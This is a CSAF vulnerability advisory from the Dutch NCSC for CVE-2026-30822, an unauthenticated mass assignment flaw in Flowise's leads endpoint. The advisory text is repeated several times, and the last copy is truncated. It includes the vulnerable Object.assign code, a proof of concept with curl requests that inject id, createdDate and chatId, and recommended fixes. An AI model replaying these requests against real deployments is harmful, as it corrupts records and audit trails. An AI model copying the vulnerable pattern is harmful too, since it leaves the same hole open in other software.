{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-30822", "tracking": { "current_release_date": "2026-03-23T04:05:54.615090Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-30822", "initial_release_date": "2026-03-06T13:06:50.096068Z", "revision_history": [ { "date": "2026-03-06T13:06:50.096068Z", "number": "1", "summary": "CVE created.| Source connected.| CVE status created. (valid)| Products connected (1).| References created (9)." }, { "date": "2026-03-06T13:06:51.896748Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-06T22:39:33.700231Z", "number": "3", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-06T22:39:40.471211Z", "number": "4", "summary": "NCSC Score updated." }, { "date": "2026-03-07T00:21:05.557063Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-07T00:21:12.848906Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-07T05:24:43.357466Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-07T05:24:53.124595Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-07T05:38:52.967882Z", "number": "9", "summary": "Source created.| CVE status created. (valid)| Description created for source.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-03-07T05:38:57.772121Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-07T14:46:36.973782Z", "number": "11", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-07T14:46:42.715608Z", "number": "12", "summary": "NCSC Score updated." }, { "date": "2026-03-09T13:39:52.140898Z", "number": "13", "summary": "References created (2)." }, { "date": "2026-03-09T13:39:55.310780Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-09T18:21:02.333826Z", "number": "15", "summary": "References created (2)." }, { "date": "2026-03-09T18:21:13.202046Z", "number": "16", "summary": "NCSC Score updated." }, { "date": "2026-03-09T21:38:59.910936Z", "number": "17", "summary": "Unknown change." }, { "date": "2026-03-11T14:25:34.079613Z", "number": "18", "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-11T14:25:40.454747Z", "number": "19", "summary": "NCSC Score updated." }, { "date": "2026-03-19T15:29:19.658436Z", "number": "20", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-19T15:29:21.390535Z", "number": "21", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:33:59.051758Z", "number": "22", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-20T09:34:03.592106Z", "number": "23", "summary": "NCSC Score updated." } ], "status": "interim", "version": "23" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<3.0.13", "product": { "name": "vers:unknown/<3.0.13", "product_id": "CSAFPID-5768607", "product_identification_helper": { "cpe": "cpe:2.3:a:flowiseai:flowise:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "Flowise" }, { "branches": [ { "category": "product_version_range", "name": "vers:unknown/>=0|<3.0.13", "product": { "name": "vers:unknown/>=0|<3.0.13", "product_id": "CSAFPID-5767907" } } ], "category": "product_name", "name": "flowise" } ], "category": "vendor", "name": "FlowiseAI" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<3.0.13", "product": { "name": "vers:unknown/<3.0.13", "product_id": "CSAFPID-5766734" } } ], "category": "product_name", "name": "Flowise" } ], "category": "vendor", "name": "Open Source" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-30822", "cwe": { "id": "CWE-915", "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes" }, "notes": [ { "category": "description", "text": "## Summary\n\n**A Mass Assignment vulnerability in the `/api/v1/leads` endpoint allows any unauthenticated user to control internal entity fields (`id`, `createdDate`, `chatId`) by including them in the request body.**\n\nThe endpoint uses `Object.assign()` to copy all properties from the request body to the Lead entity without any input validation or field filtering. This allows attackers to bypass auto-generated fields and inject arbitrary values.\n\n| Field | Value |\n|-------|-------|\n| **Vulnerability Type** | Mass Assignment |\n| **CWE ID** | [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html) |\n| **Authentication Required** | None |\n| **Affected Endpoint** | `POST /api/v1/leads` |\n\n\n---\n\n## Details\n\n### Root Cause\n\nThe vulnerability exists in `/packages/server/src/services/leads/index.ts` at lines 27-28:\n\n```typescript\n// File: /packages/server/src/services/leads/index.ts\n// Lines 23-38\n\nconst createLead = async (body: Partial) => {\n try {\n const chatId = body.chatId ?? uuidv4()\n\n const newLead = new Lead()\n Object.assign(newLead, body) // ← VULNERABILITY: All properties copied!\n Object.assign(newLead, { chatId })\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\nThe `Object.assign(newLead, body)` on line 28 copies **ALL** properties from the request body to the Lead entity, including:\n- `id` - The primary key (should be auto-generated)\n- `createdDate` - The creation timestamp (should be auto-generated)\n- `chatId` - The chat identifier\n\n### Lead Entity Definition\n\nThe Lead entity at `/packages/server/src/database/entities/Lead.ts` uses TypeORM decorators that should auto-generate these fields:\n\n```typescript\n// File: /packages/server/src/database/entities/Lead.ts\n\n@Entity()\nexport class Lead implements ILead {\n @PrimaryGeneratedColumn('uuid') // Should be auto-generated!\n id: string\n\n @Column()\n name?: string\n\n @Column()\n email?: string\n\n @Column()\n phone?: string\n\n @Column()\n chatflowid: string\n\n @Column()\n chatId: string\n\n @CreateDateColumn() // Should be auto-generated!\n createdDate: Date\n}\n```\n\nHowever, `Object.assign()` overwrites these fields before they are saved, bypassing the auto-generation.\n\n### Why the Endpoint is Publicly Accessible\n\nThe `/api/v1/leads` endpoint is whitelisted in `/packages/server/src/utils/constants.ts`:\n\n```typescript\n// File: /packages/server/src/utils/constants.ts\n// Line 20\n\nexport const WHITELIST_URLS = [\n // ... other endpoints ...\n '/api/v1/leads', // ← No authentication required\n // ... more endpoints ...\n]\n```\n\n---\n\n## Proof of Concept\n\n\"Screenshot\n\n\n### Prerequisites\n\n- Docker and Docker Compose installed\n- curl installed\n\n### Step 1: Start Flowise\n\nCreate a `docker-compose.yml`:\n\n```yaml\nservices:\n flowise:\n image: flowiseai/flowise:latest\n restart: unless-stopped\n environment:\n - PORT=3000\n - DATABASE_PATH=/root/.flowise\n - DATABASE_TYPE=sqlite\n - CORS_ORIGINS=*\n - DISABLE_FLOWISE_TELEMETRY=true\n ports:\n - '3000:3000'\n volumes:\n - flowise_data:/root/.flowise\n entrypoint: /bin/sh -c \"sleep 3; flowise start\"\n\nvolumes:\n flowise_data:\n```\n\nStart the container:\n\n```bash\ndocker compose up -d\n# Wait for Flowise to be ready (about 1-2 minutes)\ncurl http://localhost:3000/api/v1/ping\n```\n\n### Step 2: Baseline Test - Normal Lead Creation\n\nFirst, create a normal lead to see expected behavior:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"normal-chatflow-123\",\n \"name\": \"Normal User\",\n \"email\": \"normal@example.com\",\n \"phone\": \"555-0000\"\n }'\n```\n\n**Expected Response (normal behavior):**\n```json\n{\n \"id\": \"018b23e3-d6cb-4dc5-a276-922a174b44fd\",\n \"name\": \"Normal User\",\n \"email\": \"normal@example.com\",\n \"phone\": \"555-0000\",\n \"chatflowid\": \"normal-chatflow-123\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"2025-12-26T06:20:39.000Z\"\n}\n```\n\nNote: The `id` and `createdDate` are auto-generated by the server.\n\n### Step 3: Exploit - Inject Custom ID\n\nNow inject a custom `id`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"attacker-chatflow-456\",\n \"name\": \"Attacker\",\n \"email\": \"attacker@evil.com\",\n \"phone\": \"555-EVIL\",\n \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n \"name\": \"Attacker\",\n \"email\": \"attacker@evil.com\",\n \"phone\": \"555-EVIL\",\n \"chatflowid\": \"attacker-chatflow-456\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"2025-12-26T06:20:40.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled `id` was accepted!**\n\n### Step 4: Exploit - Inject Custom Timestamp\n\nInject a fake `createdDate`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"timestamp-test-789\",\n \"name\": \"Time Traveler\",\n \"email\": \"timetraveler@evil.com\",\n \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"some-auto-generated-uuid\",\n \"name\": \"Time Traveler\",\n \"email\": \"timetraveler@evil.com\",\n \"chatflowid\": \"timestamp-test-789\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled timestamp from 1970 was accepted!**\n\n### Step 5: Exploit - Combined Mass Assignment\n\nInject multiple fields at once:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"any-chatflow-attacker-wants\",\n \"name\": \"Mass Assignment Attacker\",\n \"email\": \"massassign@evil.com\",\n \"phone\": \"555-HACK\",\n \"id\": \"11111111-2222-3333-4444-555555555555\",\n \"createdDate\": \"2000-01-01T12:00:00.000Z\",\n \"chatId\": \"custom-chat-id-injected\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"11111111-2222-3333-4444-555555555555\",\n \"name\": \"Mass Assignment Attacker\",\n \"email\": \"massassign@evil.com\",\n \"phone\": \"555-HACK\",\n \"chatflowid\": \"any-chatflow-attacker-wants\",\n \"chatId\": \"custom-chat-id-injected\",\n \"createdDate\": \"2000-01-01T12:00:00.000Z\"\n}\n```\n\n**⚠️ ALL three internal fields (`id`, `createdDate`, `chatId`) were controlled by the attacker!**\n\n### Verification\n\nThe exploit succeeds because:\n1. ✅ HTTP 200 response (request accepted)\n2. ✅ `id` field contains attacker-controlled UUID\n3. ✅ `createdDate` field contains attacker-controlled timestamp\n4. ✅ `chatId` field contains attacker-controlled string\n5. ✅ No authentication headers were sent\n\n---\n\n## Impact\n\n### Who is Affected?\n\n- **All Flowise deployments** that use the leads feature\n- Both **open-source** and **enterprise** versions\n- Any system that relies on lead data integrity\n\n### Attack Scenarios\n\n| Scenario | Impact |\n|----------|--------|\n| **ID Collision Attack** | Attacker creates leads with specific UUIDs, potentially overwriting existing records or causing database conflicts |\n| **Audit Trail Manipulation** | Attacker sets fake `createdDate` values to hide malicious activity or manipulate reporting |\n| **Data Integrity Violation** | Internal fields that should be server-controlled are now user-controlled |\n| **Chatflow Association** | Attacker can link leads to arbitrary chatflows they don't own |\n\n### Severity Assessment\n\nWhile this vulnerability doesn't directly expose sensitive data (unlike the IDOR vulnerability), it violates the principle that internal/auto-generated fields should not be user-controllable. This can lead to:\n\n- Data integrity issues\n- Potential business logic bypasses\n- Audit/compliance concerns\n- Foundation for chained attacks\n\n---\n\n## Recommended Fix\n\n### Option 1: Whitelist Allowed Fields (Recommended)\n\nOnly copy explicitly allowed fields from the request body:\n\n```typescript\nconst createLead = async (body: Partial) => {\n try {\n const chatId = body.chatId ?? uuidv4()\n\n const newLead = new Lead()\n \n // ✅ Only copy allowed fields\n const allowedFields = ['chatflowid', 'name', 'email', 'phone']\n for (const field of allowedFields) {\n if (body[field] !== undefined) {\n newLead[field] = body[field]\n }\n }\n newLead.chatId = chatId\n // Let TypeORM auto-generate id and createdDate\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\n### Option 2: Use Destructuring with Explicit Fields\n\n```typescript\nconst createLead = async (body: Partial) => {\n try {\n // ✅ Only extract allowed fields\n const { chatflowid, name, email, phone } = body\n const chatId = body.chatId ?? uuidv4()\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create({\n chatflowid,\n name,\n email,\n phone,\n chatId\n // id and createdDate will be auto-generated\n })\n \n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\n### Option 3: Use class-transformer with @Exclude()\n\nAdd decorators to the Lead entity to exclude sensitive fields from assignment:\n\n```typescript\nimport { Exclude } from 'class-transformer'\n\n@Entity()\nexport class Lead implements ILead {\n @PrimaryGeneratedColumn('uuid')\n @Exclude({ toClassOnly: true }) // ✅ Prevent assignment from request\n id: string\n\n // ... other fields ...\n\n @CreateDateColumn()\n @Exclude({ toClassOnly: true }) // ✅ Prevent assignment from request\n createdDate: Date\n}\n```\n\n### Additional Recommendation\n\nConsider applying the same fix to other endpoints that use `Object.assign()` with request bodies, such as:\n- `/packages/server/src/utils/addChatMessageFeedback.ts` (similar pattern)\n\n---\n\n## Resources\n\n- [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n- [OWASP: Mass Assignment Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n- [OWASP API Security Top 10 - API6:2023 Unrestricted Access to Sensitive Business Flows](https://owasp.org/API-Security/editions/2023/en/0xa6-unrestricted-access-to-sensitive-business-flows/)\n- [Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)\n\n---", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-mq4r-h2gh-qv7x.json?alt=media" }, { "category": "description", "text": "## Summary\n\n**A Mass Assignment vulnerability in the `/api/v1/leads` endpoint allows any unauthenticated user to control internal entity fields (`id`, `createdDate`, `chatId`) by including them in the request body.**\n\nThe endpoint uses `Object.assign()` to copy all properties from the request body to the Lead entity without any input validation or field filtering. This allows attackers to bypass auto-generated fields and inject arbitrary values.\n\n| Field | Value |\n|-------|-------|\n| **Vulnerability Type** | Mass Assignment |\n| **CWE ID** | [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html) |\n| **Authentication Required** | None |\n| **Affected Endpoint** | `POST /api/v1/leads` |\n\n\n---\n\n## Details\n\n### Root Cause\n\nThe vulnerability exists in `/packages/server/src/services/leads/index.ts` at lines 27-28:\n\n```typescript\n// File: /packages/server/src/services/leads/index.ts\n// Lines 23-38\n\nconst createLead = async (body: Partial) => {\n try {\n const chatId = body.chatId ?? uuidv4()\n\n const newLead = new Lead()\n Object.assign(newLead, body) // ← VULNERABILITY: All properties copied!\n Object.assign(newLead, { chatId })\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\nThe `Object.assign(newLead, body)` on line 28 copies **ALL** properties from the request body to the Lead entity, including:\n- `id` - The primary key (should be auto-generated)\n- `createdDate` - The creation timestamp (should be auto-generated)\n- `chatId` - The chat identifier\n\n### Lead Entity Definition\n\nThe Lead entity at `/packages/server/src/database/entities/Lead.ts` uses TypeORM decorators that should auto-generate these fields:\n\n```typescript\n// File: /packages/server/src/database/entities/Lead.ts\n\n@Entity()\nexport class Lead implements ILead {\n @PrimaryGeneratedColumn('uuid') // Should be auto-generated!\n id: string\n\n @Column()\n name?: string\n\n @Column()\n email?: string\n\n @Column()\n phone?: string\n\n @Column()\n chatflowid: string\n\n @Column()\n chatId: string\n\n @CreateDateColumn() // Should be auto-generated!\n createdDate: Date\n}\n```\n\nHowever, `Object.assign()` overwrites these fields before they are saved, bypassing the auto-generation.\n\n### Why the Endpoint is Publicly Accessible\n\nThe `/api/v1/leads` endpoint is whitelisted in `/packages/server/src/utils/constants.ts`:\n\n```typescript\n// File: /packages/server/src/utils/constants.ts\n// Line 20\n\nexport const WHITELIST_URLS = [\n // ... other endpoints ...\n '/api/v1/leads', // ← No authentication required\n // ... more endpoints ...\n]\n```\n\n---\n\n## Proof of Concept\n\n\"Screenshot\n\n\n### Prerequisites\n\n- Docker and Docker Compose installed\n- curl installed\n\n### Step 1: Start Flowise\n\nCreate a `docker-compose.yml`:\n\n```yaml\nservices:\n flowise:\n image: flowiseai/flowise:latest\n restart: unless-stopped\n environment:\n - PORT=3000\n - DATABASE_PATH=/root/.flowise\n - DATABASE_TYPE=sqlite\n - CORS_ORIGINS=*\n - DISABLE_FLOWISE_TELEMETRY=true\n ports:\n - '3000:3000'\n volumes:\n - flowise_data:/root/.flowise\n entrypoint: /bin/sh -c \"sleep 3; flowise start\"\n\nvolumes:\n flowise_data:\n```\n\nStart the container:\n\n```bash\ndocker compose up -d\n# Wait for Flowise to be ready (about 1-2 minutes)\ncurl http://localhost:3000/api/v1/ping\n```\n\n### Step 2: Baseline Test - Normal Lead Creation\n\nFirst, create a normal lead to see expected behavior:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"normal-chatflow-123\",\n \"name\": \"Normal User\",\n \"email\": \"normal@example.com\",\n \"phone\": \"555-0000\"\n }'\n```\n\n**Expected Response (normal behavior):**\n```json\n{\n \"id\": \"018b23e3-d6cb-4dc5-a276-922a174b44fd\",\n \"name\": \"Normal User\",\n \"email\": \"normal@example.com\",\n \"phone\": \"555-0000\",\n \"chatflowid\": \"normal-chatflow-123\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"2025-12-26T06:20:39.000Z\"\n}\n```\n\nNote: The `id` and `createdDate` are auto-generated by the server.\n\n### Step 3: Exploit - Inject Custom ID\n\nNow inject a custom `id`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"attacker-chatflow-456\",\n \"name\": \"Attacker\",\n \"email\": \"attacker@evil.com\",\n \"phone\": \"555-EVIL\",\n \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n \"name\": \"Attacker\",\n \"email\": \"attacker@evil.com\",\n \"phone\": \"555-EVIL\",\n \"chatflowid\": \"attacker-chatflow-456\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"2025-12-26T06:20:40.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled `id` was accepted!**\n\n### Step 4: Exploit - Inject Custom Timestamp\n\nInject a fake `createdDate`:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"timestamp-test-789\",\n \"name\": \"Time Traveler\",\n \"email\": \"timetraveler@evil.com\",\n \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"some-auto-generated-uuid\",\n \"name\": \"Time Traveler\",\n \"email\": \"timetraveler@evil.com\",\n \"chatflowid\": \"timestamp-test-789\",\n \"chatId\": \"auto-generated-uuid\",\n \"createdDate\": \"1970-01-01T00:00:00.000Z\"\n}\n```\n\n**⚠️ The attacker-controlled timestamp from 1970 was accepted!**\n\n### Step 5: Exploit - Combined Mass Assignment\n\nInject multiple fields at once:\n\n```bash\ncurl -X POST http://localhost:3000/api/v1/leads \\\n -H \"Content-Type: application/json\" \\\n -d '{\n \"chatflowid\": \"any-chatflow-attacker-wants\",\n \"name\": \"Mass Assignment Attacker\",\n \"email\": \"massassign@evil.com\",\n \"phone\": \"555-HACK\",\n \"id\": \"11111111-2222-3333-4444-555555555555\",\n \"createdDate\": \"2000-01-01T12:00:00.000Z\",\n \"chatId\": \"custom-chat-id-injected\"\n }'\n```\n\n**Actual Response (vulnerability confirmed):**\n```json\n{\n \"id\": \"11111111-2222-3333-4444-555555555555\",\n \"name\": \"Mass Assignment Attacker\",\n \"email\": \"massassign@evil.com\",\n \"phone\": \"555-HACK\",\n \"chatflowid\": \"any-chatflow-attacker-wants\",\n \"chatId\": \"custom-chat-id-injected\",\n \"createdDate\": \"2000-01-01T12:00:00.000Z\"\n}\n```\n\n**⚠️ ALL three internal fields (`id`, `createdDate`, `chatId`) were controlled by the attacker!**\n\n### Verification\n\nThe exploit succeeds because:\n1. ✅ HTTP 200 response (request accepted)\n2. ✅ `id` field contains attacker-controlled UUID\n3. ✅ `createdDate` field contains attacker-controlled timestamp\n4. ✅ `chatId` field contains attacker-controlled string\n5. ✅ No authentication headers were sent\n\n---\n\n## Impact\n\n### Who is Affected?\n\n- **All Flowise deployments** that use the leads feature\n- Both **open-source** and **enterprise** versions\n- Any system that relies on lead data integrity\n\n### Attack Scenarios\n\n| Scenario | Impact |\n|----------|--------|\n| **ID Collision Attack** | Attacker creates leads with specific UUIDs, potentially overwriting existing records or causing database conflicts |\n| **Audit Trail Manipulation** | Attacker sets fake `createdDate` values to hide malicious activity or manipulate reporting |\n| **Data Integrity Violation** | Internal fields that should be server-controlled are now user-controlled |\n| **Chatflow Association** | Attacker can link leads to arbitrary chatflows they don't own |\n\n### Severity Assessment\n\nWhile this vulnerability doesn't directly expose sensitive data (unlike the IDOR vulnerability), it violates the principle that internal/auto-generated fields should not be user-controllable. This can lead to:\n\n- Data integrity issues\n- Potential business logic bypasses\n- Audit/compliance concerns\n- Foundation for chained attacks\n\n---\n\n## Recommended Fix\n\n### Option 1: Whitelist Allowed Fields (Recommended)\n\nOnly copy explicitly allowed fields from the request body:\n\n```typescript\nconst createLead = async (body: Partial) => {\n try {\n const chatId = body.chatId ?? uuidv4()\n\n const newLead = new Lead()\n \n // ✅ Only copy allowed fields\n const allowedFields = ['chatflowid', 'name', 'email', 'phone']\n for (const field of allowedFields) {\n if (body[field] !== undefined) {\n newLead[field] = body[field]\n }\n }\n newLead.chatId = chatId\n // Let TypeORM auto-generate id and createdDate\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\n### Option 2: Use Destructuring with Explicit Fields\n\n```typescript\nconst createLead = async (body: Partial) => {\n try {\n // ✅ Only extract allowed fields\n const { chatflowid, name, email, phone } = body\n const chatId = body.chatId ?? uuidv4()\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create({\n chatflowid,\n name,\n email,\n phone,\n chatId\n // id and createdDate will be auto-generated\n })\n \n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\n### Option 3: Use class-transformer with @Exclude()\n\nAdd decorators to the Lead entity to exclude sensitive fields from assignment:\n\n```typescript\nimport { Exclude } from 'class-transformer'\n\n@Entity()\nexport class Lead implements ILead {\n @PrimaryGeneratedColumn('uuid')\n @Exclude({ toClassOnly: true }) // ✅ Prevent assignment from request\n id: string\n\n // ... other fields ...\n\n @CreateDateColumn()\n @Exclude({ toClassOnly: true }) // ✅ Prevent assignment from request\n createdDate: Date\n}\n```\n\n### Additional Recommendation\n\nConsider applying the same fix to other endpoints that use `Object.assign()` with request bodies, such as:\n- `/packages/server/src/utils/addChatMessageFeedback.ts` (similar pattern)\n\n---\n\n## Resources\n\n- [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html)\n- [OWASP: Mass Assignment Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)\n- [OWASP API Security Top 10 - API6:2023 Unrestricted Access to Sensitive Business Flows](https://owasp.org/API-Security/editions/2023/en/0xa6-unrestricted-access-to-sensitive-business-flows/)\n- [Node.js Security Best Practices](https://nodejs.org/en/docs/guides/security/)\n\n---", "title": "github - https://github.com/advisories/GHSA-mq4r-h2gh-qv7x" }, { "category": "description", "text": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-30822" }, { "category": "description", "text": "Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.0.13, unauthenticated users can inject arbitrary values into internal database fields when creating leads. This issue has been patched in version 3.0.13.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-30822" }, { "category": "description", "text": "## Summary\n\n**A Mass Assignment vulnerability in the `/api/v1/leads` endpoint allows any unauthenticated user to control internal entity fields (`id`, `createdDate`, `chatId`) by including them in the request body.**\n\nThe endpoint uses `Object.assign()` to copy all properties from the request body to the Lead entity without any input validation or field filtering. This allows attackers to bypass auto-generated fields and inject arbitrary values.\n\n| Field | Value |\n|-------|-------|\n| **Vulnerability Type** | Mass Assignment |\n| **CWE ID** | [CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes](https://cwe.mitre.org/data/definitions/915.html) |\n| **Authentication Required** | None |\n| **Affected Endpoint** | `POST /api/v1/leads` |\n\n\n---\n\n## Details\n\n### Root Cause\n\nThe vulnerability exists in `/packages/server/src/services/leads/index.ts` at lines 27-28:\n\n```typescript\n// File: /packages/server/src/services/leads/index.ts\n// Lines 23-38\n\nconst createLead = async (body: Partial) => {\n try {\n const chatId = body.chatId ?? uuidv4()\n\n const newLead = new Lead()\n Object.assign(newLead, body) // ← VULNERABILITY: All properties copied!\n Object.assign(newLead, { chatId })\n\n const appServer = getRunningExpressApp()\n const lead = appServer.AppDataSource.getRepository(Lead).create(newLead)\n const dbResponse = await appServer.AppDataSource.getRepository(Lead).save(lead)\n return dbResponse\n } catch (error) {\n throw new InternalFlowiseError(...)\n }\n}\n```\n\nThe `Object.assign(newLead, body)` on line 28 copies **ALL** properties from the request body to the Lead entity, including:\n- `id` - The primary key (should be auto-generated)\n- `createdDate` - The creation timestamp (should be auto-generated)\n- `chatId` - The chat identifier\n\n### Lead Entity Definition\n\nThe Lead entity at `/packages/server/src/database/entities/Lead.ts` uses TypeORM decorators that should auto-generate these fields:\n\n```typescript\n// File: /packages/server/src/database/entities/Lead.ts\n\n@Entity()\nexport class Lead implements ILead {\n @PrimaryGeneratedColumn('uuid') // Should be auto-generated!\n id: string\n\n @Column()\n name?: string\n\n @Column()\n email?: string\n\n @Column()\n phone?: string\n\n @Column()\n chatflowid: string\n\n @Column()\n chatId: string\n\n @CreateDateColumn() // Should be auto-generated!\n createdDate: Date\n}\n```\n\nHowever, `Object.assign()` overwrites these fields before they are saved, bypassing the auto-generation.\n\n### Why the Endpoint is Publicly Accessible\n\nThe `/api/v1/leads` endpoint is whitelisted in `/packages/server/src/utils/constants.ts`:\n\n```typescript\n// File: /packages/server/src/utils/constants.ts\n// Line 20\n\nexport const WHITELIST_URLS = [\n // ... other endpoints ...\n '/api/v1/leads', // ← No authentication required\n // ... more endpoints ...\n]\n```\n\n---\n\n## Proof of Concept\n\n\"Screenshot\n\n\n### Prerequisites\n\n- Docker and Docker Compose installed\n- curl installed\n\n### Step 1: Start Flowise\n\nCreate a `docker-compose.yml`:\n\n```yaml\nservices:\n flowise:\n 